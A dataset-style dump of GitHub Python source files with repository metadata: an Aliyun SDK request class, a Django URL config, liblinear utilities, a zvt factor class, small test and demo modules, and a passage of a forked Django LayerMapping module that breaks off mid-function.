blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2578528564d2c4d90da1640f3c12ae6c73e0d8af | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-arms/aliyunsdkarms/request/v20190808/AddAliClusterIdsToPrometheusGlobalViewRequest.py | 608724ae8db521efd090e0e954135fd3239ee643 | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 1,942 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkarms.endpoint import endpoint_data
class AddAliClusterIdsToPrometheusGlobalViewRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'ARMS', '2019-08-08', 'AddAliClusterIdsToPrometheusGlobalView','arms')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_GlobalViewClusterId(self): # String
return self.get_query_params().get('GlobalViewClusterId')
def set_GlobalViewClusterId(self, GlobalViewClusterId): # String
self.add_query_param('GlobalViewClusterId', GlobalViewClusterId)
def get_ClusterIds(self): # String
return self.get_query_params().get('ClusterIds')
def set_ClusterIds(self, ClusterIds): # String
self.add_query_param('ClusterIds', ClusterIds)
def get_GroupName(self): # String
return self.get_query_params().get('GroupName')
def set_GroupName(self, GroupName): # String
self.add_query_param('GroupName', GroupName)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
5a8fa192e306fa2337bd2ef329ae9a46e3d48ae0 | 6def8685a0de2e8df907834392a93205eb1d4f5f | /backend/msm_tc545_dev_14821/urls.py | 26cf4c94cc4093d986a29bd7d46d15863c9235c8 | [] | no_license | crowdbotics-apps/msm-tc545-dev-14821 | 03c1c0212e86f41bb1f28703d0b3a0312d278e60 | 2384578310b6e89bf4abd22d47c62e6290ab4e60 | refs/heads/master | 2023-02-15T22:32:10.980144 | 2021-01-07T02:20:27 | 2021-01-07T02:20:27 | 311,251,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,970 | py | """msm_tc545_dev_14821 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
path("home/", include("home.urls")),
]
admin.site.site_header = "MSM-TC545"
admin.site.site_title = "MSM-TC545 Admin Portal"
admin.site.index_title = "MSM-TC545 Admin"
# swagger
api_info = openapi.Info(
title="MSM-TC545 API",
default_version="v1",
description="API documentation for MSM-TC545 App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
d07a82c489ce5625ab702e7ed76c4caa890f41f0 | c11c27b07086e97c633a833d37787474724bd2d2 | /src/IJB-A/identification/train_svm/liblinear-2.1/python/liblinearutil.py | cb5e60beed8eaa93b579424a171d945e2c86b4c1 | [
"MIT",
"BSD-3-Clause"
] | permissive | willyspinner/High-Performance-Face-Recognition | d1826a73653dede6b43799439e4fb692f119c70b | c5caad61be97fd20f9c47a727278ff938dc5cc8f | refs/heads/master | 2020-06-22T16:36:29.663302 | 2019-07-19T09:41:47 | 2019-07-19T09:41:47 | 197,746,624 | 0 | 0 | MIT | 2019-07-19T09:42:00 | 2019-07-19T09:41:59 | null | UTF-8 | Python | false | false | 8,612 | py | #!/usr/bin/env python
import os, sys
sys.path = [os.path.dirname(os.path.abspath(__file__))] + sys.path
from liblinear import *
from liblinear import __all__ as liblinear_all
from ctypes import c_double
__all__ = ['svm_read_problem', 'load_model', 'save_model', 'evaluations',
'train', 'predict'] + liblinear_all
def svm_read_problem(data_file_name):
"""
svm_read_problem(data_file_name) -> [y, x]
Read LIBSVM-format data from data_file_name and return labels y
and data instances x.
"""
prob_y = []
prob_x = []
for line in open(data_file_name):
line = line.split(None, 1)
# In case an instance with all zero features
if len(line) == 1: line += ['']
label, features = line
xi = {}
for e in features.split():
ind, val = e.split(":")
xi[int(ind)] = float(val)
prob_y += [float(label)]
prob_x += [xi]
return (prob_y, prob_x)
def load_model(model_file_name):
"""
load_model(model_file_name) -> model
Load a LIBLINEAR model from model_file_name and return.
"""
model = liblinear.load_model(model_file_name.encode())
if not model:
print("can't open model file %s" % model_file_name)
return None
model = toPyModel(model)
return model
def save_model(model_file_name, model):
"""
save_model(model_file_name, model) -> None
Save a LIBLINEAR model to the file model_file_name.
"""
liblinear.save_model(model_file_name.encode(), model)
def evaluations(ty, pv):
"""
evaluations(ty, pv) -> (ACC, MSE, SCC)
Calculate accuracy, mean squared error and squared correlation coefficient
using the true values (ty) and predicted values (pv).
"""
if len(ty) != len(pv):
raise ValueError("len(ty) must equal to len(pv)")
total_correct = total_error = 0
sumv = sumy = sumvv = sumyy = sumvy = 0
for v, y in zip(pv, ty):
if y == v:
total_correct += 1
total_error += (v-y)*(v-y)
sumv += v
sumy += y
sumvv += v*v
sumyy += y*y
sumvy += v*y
l = len(ty)
ACC = 100.0*total_correct/l
MSE = total_error/l
try:
SCC = ((l*sumvy-sumv*sumy)*(l*sumvy-sumv*sumy))/((l*sumvv-sumv*sumv)*(l*sumyy-sumy*sumy))
except:
SCC = float('nan')
return (ACC, MSE, SCC)
def train(arg1, arg2=None, arg3=None):
"""
train(y, x [, options]) -> model | ACC
train(prob [, options]) -> model | ACC
train(prob, param) -> model | ACC
Train a model from data (y, x) or a problem prob using
'options' or a parameter param.
If '-v' is specified in 'options' (i.e., cross validation)
either accuracy (ACC) or mean-squared error (MSE) is returned.
options:
-s type : set type of solver (default 1)
for multi-class classification
0 -- L2-regularized logistic regression (primal)
1 -- L2-regularized L2-loss support vector classification (dual)
2 -- L2-regularized L2-loss support vector classification (primal)
3 -- L2-regularized L1-loss support vector classification (dual)
4 -- support vector classification by Crammer and Singer
5 -- L1-regularized L2-loss support vector classification
6 -- L1-regularized logistic regression
7 -- L2-regularized logistic regression (dual)
for regression
11 -- L2-regularized L2-loss support vector regression (primal)
12 -- L2-regularized L2-loss support vector regression (dual)
13 -- L2-regularized L1-loss support vector regression (dual)
-c cost : set the parameter C (default 1)
-p epsilon : set the epsilon in loss function of SVR (default 0.1)
-e epsilon : set tolerance of termination criterion
-s 0 and 2
|f'(w)|_2 <= eps*min(pos,neg)/l*|f'(w0)|_2,
where f is the primal function, (default 0.01)
-s 11
|f'(w)|_2 <= eps*|f'(w0)|_2 (default 0.001)
-s 1, 3, 4, and 7
Dual maximal violation <= eps; similar to liblinear (default 0.)
-s 5 and 6
|f'(w)|_inf <= eps*min(pos,neg)/l*|f'(w0)|_inf,
where f is the primal function (default 0.01)
-s 12 and 13
|f'(alpha)|_1 <= eps |f'(alpha0)|,
where f is the dual function (default 0.1)
-B bias : if bias >= 0, instance x becomes [x; bias]; if < 0, no bias term added (default -1)
-wi weight: weights adjust the parameter C of different classes (see README for details)
-v n: n-fold cross validation mode
-q : quiet mode (no outputs)
"""
prob, param = None, None
if isinstance(arg1, (list, tuple)):
assert isinstance(arg2, (list, tuple))
y, x, options = arg1, arg2, arg3
prob = problem(y, x)
param = parameter(options)
elif isinstance(arg1, problem):
prob = arg1
if isinstance(arg2, parameter):
param = arg2
else :
param = parameter(arg2)
if prob == None or param == None :
raise TypeError("Wrong types for the arguments")
prob.set_bias(param.bias)
liblinear.set_print_string_function(param.print_func)
err_msg = liblinear.check_parameter(prob, param)
if err_msg :
raise ValueError('Error: %s' % err_msg)
if param.flag_find_C:
nr_fold = param.nr_fold
best_C = c_double()
best_rate = c_double()
max_C = 1024
if param.flag_C_specified:
start_C = param.C
else:
start_C = -1.0
liblinear.find_parameter_C(prob, param, nr_fold, start_C, max_C, best_C, best_rate)
print("Best C = %lf CV accuracy = %g%%\n"% (best_C.value, 100.0*best_rate.value))
return best_C.value,best_rate.value
elif param.flag_cross_validation:
l, nr_fold = prob.l, param.nr_fold
target = (c_double * l)()
liblinear.cross_validation(prob, param, nr_fold, target)
ACC, MSE, SCC = evaluations(prob.y[:l], target[:l])
if param.solver_type in [L2R_L2LOSS_SVR, L2R_L2LOSS_SVR_DUAL, L2R_L1LOSS_SVR_DUAL]:
print("Cross Validation Mean squared error = %g" % MSE)
print("Cross Validation Squared correlation coefficient = %g" % SCC)
return MSE
else:
print("Cross Validation Accuracy = %g%%" % ACC)
return ACC
else :
m = liblinear.train(prob, param)
m = toPyModel(m)
return m
def predict(y, x, m, options=""):
"""
predict(y, x, m [, options]) -> (p_labels, p_acc, p_vals)
Predict data (y, x) with the SVM model m.
options:
-b probability_estimates: whether to output probability estimates, 0 or 1 (default 0); currently for logistic regression only
-q quiet mode (no outputs)
The return tuple contains
p_labels: a list of predicted labels
p_acc: a tuple including accuracy (for classification), mean-squared
error, and squared correlation coefficient (for regression).
p_vals: a list of decision values or probability estimates (if '-b 1'
is specified). If k is the number of classes, for decision values,
each element includes results of predicting k binary-class
SVMs. if k = 2 and solver is not MCSVM_CS, only one decision value
is returned. For probabilities, each element contains k values
indicating the probability that the testing instance is in each class.
Note that the order of classes here is the same as 'model.label'
field in the model structure.
"""
def info(s):
print(s)
predict_probability = 0
argv = options.split()
i = 0
while i < len(argv):
if argv[i] == '-b':
i += 1
predict_probability = int(argv[i])
elif argv[i] == '-q':
info = print_null
else:
raise ValueError("Wrong options")
i+=1
solver_type = m.param.solver_type
nr_class = m.get_nr_class()
nr_feature = m.get_nr_feature()
is_prob_model = m.is_probability_model()
bias = m.bias
if bias >= 0:
biasterm = feature_node(nr_feature+1, bias)
else:
biasterm = feature_node(-1, bias)
pred_labels = []
pred_values = []
if predict_probability:
if not is_prob_model:
raise TypeError('probability output is only supported for logistic regression')
prob_estimates = (c_double * nr_class)()
for xi in x:
xi, idx = gen_feature_nodearray(xi, feature_max=nr_feature)
xi[-2] = biasterm
label = liblinear.predict_probability(m, xi, prob_estimates)
values = prob_estimates[:nr_class]
pred_labels += [label]
pred_values += [values]
else:
if nr_class <= 2:
nr_classifier = 1
else:
nr_classifier = nr_class
dec_values = (c_double * nr_classifier)()
for xi in x:
xi, idx = gen_feature_nodearray(xi, feature_max=nr_feature)
xi[-2] = biasterm
label = liblinear.predict_values(m, xi, dec_values)
values = dec_values[:nr_classifier]
pred_labels += [label]
pred_values += [values]
if len(y) == 0:
y = [0] * len(x)
ACC, MSE, SCC = evaluations(y, pred_labels)
l = len(y)
if m.is_regression_model():
info("Mean squared error = %g (regression)" % MSE)
info("Squared correlation coefficient = %g (regression)" % SCC)
else:
info("Accuracy = %g%% (%d/%d) (classification)" % (ACC, int(l*ACC/100), l))
return pred_labels, (ACC, MSE, SCC), pred_values
| [
"noreply@github.com"
] | willyspinner.noreply@github.com |
01f79e945aa8ede3d9d38abea3cc7b1fb8882ac5 | 0c8214d0d7827a42225b629b7ebcb5d2b57904b0 | /examples/fileio/E002_Packages/main.py | 19e09b50a6ebd79e9cb6f9d8ecd726852d7fd3a3 | [] | no_license | mertturkmenoglu/python-examples | 831b54314410762c73fe2b9e77aee76fe32e24da | 394072e1ca3e62b882d0d793394c135e9eb7a56e | refs/heads/master | 2020-05-04T15:42:03.816771 | 2020-01-06T19:37:05 | 2020-01-06T19:37:05 | 179,252,826 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | # Example 022: Package example
from Calculator.Math import add
import Calculator.Test.testFile
import Calculator.UI.button as button
Calculator.print_info()
add.print_info()
Calculator.Test.print_info()
Calculator.Test.testFile.print_info()
button.print_info()
Calculator.UI.print_info()
| [
"mertturkmenoglu99@gmail.com"
] | mertturkmenoglu99@gmail.com |
cded64f961102cd11ec1e54dc84e92ce55d24117 | 8cccdb1ca93d1b7ed690eb096522262523948a72 | /accounting/apps/books/templatetags/nav.py | 689c89c26b6fdc2af3ddbe4cf8790bda85d185e3 | [
"MIT"
] | permissive | newhub-spec/django-accounting | 6b886378219dbed1d4f2ee34e71be198a7b28eb5 | 12b01a944d368ce717b57957d26d7aa4ecd04285 | refs/heads/master | 2020-08-21T08:06:41.318805 | 2019-10-19T06:33:41 | 2019-10-19T06:33:41 | 216,116,659 | 0 | 0 | MIT | 2019-10-18T22:35:01 | 2019-10-18T22:35:01 | null | UTF-8 | Python | false | false | 438 | py | # encoding: utf-8
import re
from django import template
register = template.Library()
@register.simple_tag
def active(request, pattern, exact_match=False):
if exact_match:
if not pattern.startswith('^'):
pattern = '^' + pattern
if not pattern.endswith('$'):
pattern = pattern + '$'
if hasattr(request, 'path') and re.search(pattern, request.path):
return 'active'
return ''
| [
"dulacpier@gmail.com"
] | dulacpier@gmail.com |
24274aec2247b51c41ce5a5a4b1cd459f9cc1319 | 34799a9e04b8e22c9d364d1f5dcaea05ea204fcb | /test-suite/tests/__init__.py | f1a56342ffdb3195695527f95065e03ae96c467d | [
"Apache-2.0"
] | permissive | ken-ebert/indy-agent | 90fa0da1f3cf0203ef0d88278c8f97753afb7ad9 | ecd8a2cc927d762acf4c4263cc6d3fc115188c7e | refs/heads/master | 2020-04-01T15:42:59.523802 | 2018-10-17T23:24:18 | 2018-10-17T23:31:38 | 153,348,553 | 0 | 0 | Apache-2.0 | 2018-10-16T20:17:39 | 2018-10-16T20:17:39 | null | UTF-8 | Python | false | false | 695 | py | """ Module containing Agent Test Suite Tests.
"""
import asyncio
import pytest
from typing import Callable
from transport import BaseTransport
async def expect_message(transport: BaseTransport, timeout: int):
get_message_task = asyncio.ensure_future(transport.recv())
sleep_task = asyncio.ensure_future(asyncio.sleep(timeout))
finished, unfinished = await asyncio.wait(
[
get_message_task,
sleep_task
],
return_when=asyncio.FIRST_COMPLETED
)
if get_message_task in finished:
return get_message_task.result()
for task in unfinished:
task.cancel()
pytest.fail("No message received before timing out")
| [
"daniel.bluhm@sovrin.org"
] | daniel.bluhm@sovrin.org |
18d5543138466a911998784eecb91c9d030002f5 | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /important_man/company/seem_company_up_thing.py | 78bc48efc26459683f86fab76e7a748d4698894e | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py |
#! /usr/bin/env python
def other_way(str_arg):
think_able_day_about_long_woman(str_arg)
print('bad_work_and_long_time')
def think_able_day_about_long_woman(str_arg):
print(str_arg)
if __name__ == '__main__':
other_way('next_week')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
1c5c34211e4bc00f464ac84a0e9215cdd9aa535b | 3c2cc8910c4a333a44d2d7b22489ef8d5ddb6a13 | /src/zvt/factors/technical_factor.py | d0cc199697d42ffd729a0796da9dfaf84c4a99b8 | [
"MIT"
] | permissive | zvtvz/zvt | 6341dc765177b1e99727207f1608b730cbbb705a | 03aee869fd432bb933d59ba419401cfc11501392 | refs/heads/master | 2023-08-28T10:05:29.185590 | 2023-08-01T10:19:03 | 2023-08-01T10:19:03 | 179,451,497 | 2,782 | 922 | MIT | 2023-04-04T09:31:03 | 2019-04-04T08:06:57 | Python | UTF-8 | Python | false | false | 3,256 | py | from typing import List, Union, Type, Optional
import pandas as pd
from zvt.api.kdata import get_kdata_schema, default_adjust_type
from zvt.contract import IntervalLevel, TradableEntity, AdjustType
from zvt.contract.factor import Factor, Transformer, Accumulator, FactorMeta
from zvt.domain import Stock
class TechnicalFactor(Factor, metaclass=FactorMeta):
def __init__(
self,
entity_schema: Type[TradableEntity] = Stock,
provider: str = None,
entity_provider: str = None,
entity_ids: List[str] = None,
exchanges: List[str] = None,
codes: List[str] = None,
start_timestamp: Union[str, pd.Timestamp] = None,
end_timestamp: Union[str, pd.Timestamp] = None,
columns: List = None,
filters: List = None,
order: object = None,
limit: int = None,
level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY,
category_field: str = "entity_id",
time_field: str = "timestamp",
keep_window: int = None,
keep_all_timestamp: bool = False,
fill_method: str = "ffill",
effective_number: int = None,
transformer: Transformer = None,
accumulator: Accumulator = None,
need_persist: bool = False,
only_compute_factor: bool = False,
factor_name: str = None,
clear_state: bool = False,
only_load_factor: bool = False,
adjust_type: Union[AdjustType, str] = None,
) -> None:
if columns is None:
columns = [
"id",
"entity_id",
"timestamp",
"level",
"open",
"close",
"high",
"low",
"volume",
"turnover",
"turnover_rate",
]
# 股票默认使用后复权
if not adjust_type:
adjust_type = default_adjust_type(entity_type=entity_schema.__name__)
self.adjust_type = adjust_type
self.data_schema = get_kdata_schema(entity_schema.__name__, level=level, adjust_type=adjust_type)
if not factor_name:
if type(level) == str:
factor_name = f"{type(self).__name__.lower()}_{level}"
else:
factor_name = f"{type(self).__name__.lower()}_{level.value}"
super().__init__(
self.data_schema,
entity_schema,
provider,
entity_provider,
entity_ids,
exchanges,
codes,
start_timestamp,
end_timestamp,
columns,
filters,
order,
limit,
level,
category_field,
time_field,
keep_window,
keep_all_timestamp,
fill_method,
effective_number,
transformer,
accumulator,
need_persist,
only_compute_factor,
factor_name,
clear_state,
only_load_factor,
)
def drawer_sub_df_list(self) -> Optional[List[pd.DataFrame]]:
return [self.factor_df[["volume"]]]
# the __all__ is generated
__all__ = ["TechnicalFactor"]
| [
"5533061@qq.com"
] | 5533061@qq.com |
10fc611f244c7439f29211b24a36261464ec5e9a | af05993925e3a7d57f074a26f3cd271efbeb1747 | /contrib/gis/utils/layermapping.py | a667e36095beba478e62cbf420776443498b10a8 | [] | no_license | tigerman-SFC/django_with_TimeStamp | b7a448a0f367d8e5761d32afb2dd1651926bc31d | 83708187b654ad157ad8d60410062b6d90c4a182 | refs/heads/master | 2021-01-06T20:39:47.412139 | 2017-08-07T05:37:42 | 2017-08-07T05:37:42 | 99,539,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,428 | py | # LayerMapping -- A Django Model/OGR Layer Mapping Utility
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
For more information, please consult the GeoDjango documentation:
https://docs.djangoproject.com/en/dev/ref/contrib/gis/layermapping/
"""
import sys
from decimal import Decimal, InvalidOperation as DecimalInvalidOperation
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.gdal import (
CoordTransform, DataSource, GDALException, OGRGeometry, OGRGeomType,
SpatialReference,
)
from django.contrib.gis.gdal.field import (
OFTDate, OFTDateTime, OFTInteger, OFTInteger64, OFTReal, OFTString,
OFTTime,
)
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import connections, models, router, transaction
from django.utils import six
from django.utils.encoding import force_text
# LayerMapping exceptions.
class LayerMapError(Exception):
pass
class InvalidString(LayerMapError):
pass
class InvalidDecimal(LayerMapError):
pass
class InvalidInteger(LayerMapError):
pass
class MissingForeignKey(LayerMapError):
pass
class LayerMapping(object):
"A class that maps OGR Layers to GeoDjango Models."
# Acceptable 'base' types for a multi-geometry type.
MULTI_TYPES = {1: OGRGeomType('MultiPoint'),
2: OGRGeomType('MultiLineString'),
3: OGRGeomType('MultiPolygon'),
OGRGeomType('Point25D').num: OGRGeomType('MultiPoint25D'),
OGRGeomType('LineString25D').num: OGRGeomType('MultiLineString25D'),
OGRGeomType('Polygon25D').num: OGRGeomType('MultiPolygon25D'),
}
# Acceptable Django field types and corresponding acceptable OGR
# counterparts.
FIELD_TYPES = {
models.AutoField: OFTInteger,
models.BigAutoField: OFTInteger64,
models.IntegerField: (OFTInteger, OFTReal, OFTString),
models.FloatField: (OFTInteger, OFTReal),
models.DateField: OFTDate,
models.DateTimeField: OFTDateTime,
models.EmailField: OFTString,
models.TimeField: OFTTime,
models.DecimalField: (OFTInteger, OFTReal),
models.CharField: OFTString,
models.SlugField: OFTString,
models.TextField: OFTString,
models.URLField: OFTString,
models.BigIntegerField: (OFTInteger, OFTReal, OFTString),
models.SmallIntegerField: (OFTInteger, OFTReal, OFTString),
models.PositiveSmallIntegerField: (OFTInteger, OFTReal, OFTString),
models.TimeStampField: (OFTInteger) # Added By Inoue
}
def __init__(self, model, data, mapping, layer=0,
source_srs=None, encoding='utf-8',
transaction_mode='commit_on_success',
transform=True, unique=None, using=None):
"""
A LayerMapping object is initialized using the given Model (not an instance),
a DataSource (or string path to an OGR-supported data file), and a mapping
dictionary. See the module level docstring for more details and keyword
argument usage.
"""
# Getting the DataSource and the associated Layer.
if isinstance(data, six.string_types):
self.ds = DataSource(data, encoding=encoding)
else:
self.ds = data
self.layer = self.ds[layer]
self.using = using if using is not None else router.db_for_write(model)
self.spatial_backend = connections[self.using].ops
# Setting the mapping & model attributes.
self.mapping = mapping
self.model = model
# Checking the layer -- initialization of the object will fail if
# things don't check out before hand.
self.check_layer()
# Getting the geometry column associated with the model (an
# exception will be raised if there is no geometry column).
if connections[self.using].features.supports_transform:
self.geo_field = self.geometry_field()
else:
transform = False
# Checking the source spatial reference system, and getting
# the coordinate transformation object (unless the `transform`
# keyword is set to False)
if transform:
self.source_srs = self.check_srs(source_srs)
self.transform = self.coord_transform()
else:
self.transform = transform
# Setting the encoding for OFTString fields, if specified.
if encoding:
# Making sure the encoding exists, if not a LookupError
# exception will be thrown.
from codecs import lookup
lookup(encoding)
self.encoding = encoding
else:
self.encoding = None
if unique:
self.check_unique(unique)
transaction_mode = 'autocommit' # Has to be set to autocommit.
self.unique = unique
else:
self.unique = None
# Setting the transaction decorator with the function in the
# transaction modes dictionary.
self.transaction_mode = transaction_mode
if transaction_mode == 'autocommit':
self.transaction_decorator = None
elif transaction_mode == 'commit_on_success':
self.transaction_decorator = transaction.atomic
else:
raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)
# #### Checking routines used during initialization ####
def check_fid_range(self, fid_range):
"This checks the `fid_range` keyword."
if fid_range:
if isinstance(fid_range, (tuple, list)):
return slice(*fid_range)
elif isinstance(fid_range, slice):
return fid_range
else:
raise TypeError
else:
return None
def check_layer(self):
"""
This checks the Layer metadata, and ensures that it is compatible
with the mapping information and model. Unlike previous revisions,
there is no need to increment through each feature in the Layer.
"""
# The geometry field of the model is set here.
# TODO: Support more than one geometry field / model. However, this
# depends on the GDAL Driver in use.
self.geom_field = False
self.fields = {}
# Getting lists of the field names and the field types available in
# the OGR Layer.
ogr_fields = self.layer.fields
ogr_field_types = self.layer.field_types
# Function for determining if the OGR mapping field is in the Layer.
def check_ogr_fld(ogr_map_fld):
try:
idx = ogr_fields.index(ogr_map_fld)
except ValueError:
raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
return idx
# No need to increment through each feature in the model, simply check
# the Layer metadata against what was given in the mapping dictionary.
for field_name, ogr_name in self.mapping.items():
# Ensuring that a corresponding field exists in the model
# for the given field name in the mapping.
try:
model_field = self.model._meta.get_field(field_name)
except FieldDoesNotExist:
raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)
# Getting the string name for the Django field class (e.g., 'PointField').
fld_name = model_field.__class__.__name__
if isinstance(model_field, GeometryField):
if self.geom_field:
raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')
# Getting the coordinate dimension of the geometry field.
coord_dim = model_field.dim
try:
if coord_dim == 3:
gtype = OGRGeomType(ogr_name + '25D')
else:
gtype = OGRGeomType(ogr_name)
except GDALException:
raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)
# Making sure that the OGR Layer's Geometry is compatible.
ltype = self.layer.geom_type
if not (ltype.name.startswith(gtype.name) or self.make_multi(ltype, model_field)):
raise LayerMapError('Invalid mapping geometry; model has %s%s, '
'layer geometry type is %s.' %
(fld_name, '(dim=3)' if coord_dim == 3 else '', ltype))
# Setting the `geom_field` attribute w/the name of the model field
# that is a Geometry. Also setting the coordinate dimension
# attribute.
self.geom_field = field_name
self.coord_dim = coord_dim
fields_val = model_field
elif isinstance(model_field, models.ForeignKey):
if isinstance(ogr_name, dict):
# Is every given related model mapping field in the Layer?
rel_model = model_field.remote_field.model
for rel_name, ogr_field in ogr_name.items():
idx = check_ogr_fld(ogr_field)
try:
rel_model._meta.get_field(rel_name)
except FieldDoesNotExist:
raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
(rel_name, rel_model.__class__.__name__))
fields_val = rel_model
else:
raise TypeError('ForeignKey mapping must be of dictionary type.')
else:
# Is the model field type supported by LayerMapping?
if model_field.__class__ not in self.FIELD_TYPES:
raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)
# Is the OGR field in the Layer?
idx = check_ogr_fld(ogr_name)
ogr_field = ogr_field_types[idx]
# Can the OGR field type be mapped to the Django field type?
if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
(ogr_field, ogr_field.__name__, fld_name))
fields_val = model_field
self.fields[field_name] = fields_val
def check_srs(self, source_srs):
"Checks the compatibility of the given spatial reference object."
if isinstance(source_srs, SpatialReference):
sr = source_srs
elif isinstance(source_srs, self.spatial_backend.spatial_ref_sys()):
sr = source_srs.srs
elif isinstance(source_srs, (int, six.string_types)):
sr = SpatialReference(source_srs)
else:
# Otherwise just pulling the SpatialReference from the layer
sr = self.layer.srs
if not sr:
raise LayerMapError('No source reference system defined.')
else:
return sr
def check_unique(self, unique):
"Checks the `unique` keyword parameter -- may be a sequence or string."
if isinstance(unique, (list, tuple)):
# List of fields to determine uniqueness with
for attr in unique:
if attr not in self.mapping:
raise ValueError
elif isinstance(unique, six.string_types):
# Only a single field passed in.
if unique not in self.mapping:
raise ValueError
else:
raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')
# Keyword argument retrieval routines ####
def feature_kwargs(self, feat):
"""
Given an OGR Feature, this will return a dictionary of keyword arguments
for constructing the mapped model.
"""
# The keyword arguments for model construction.
kwargs = {}
# Incrementing through each model field and OGR field in the
# dictionary mapping.
for field_name, ogr_name in self.mapping.items():
model_field = self.fields[field_name]
if isinstance(model_field, GeometryField):
# Verify OGR geometry.
try:
val = self.verify_geom(feat.geom, model_field)
except GDALException:
raise LayerMapError('Could not retrieve geometry from feature.')
elif isinstance(model_field, models.base.ModelBase):
# The related _model_, not a field was passed in -- indicating
# another mapping for the related Model.
val = self.verify_fk(feat, model_field, ogr_name)
else:
# Otherwise, verify OGR Field type.
val = self.verify_ogr_field(feat[ogr_name], model_field)
# Setting the keyword arguments for the field name with the
# value obtained above.
kwargs[field_name] = val
return kwargs
def unique_kwargs(self, kwargs):
"""
Given the feature keyword arguments (from `feature_kwargs`) this routine
will construct and return the uniqueness keyword arguments -- a subset
of the feature kwargs.
"""
if isinstance(self.unique, six.string_types):
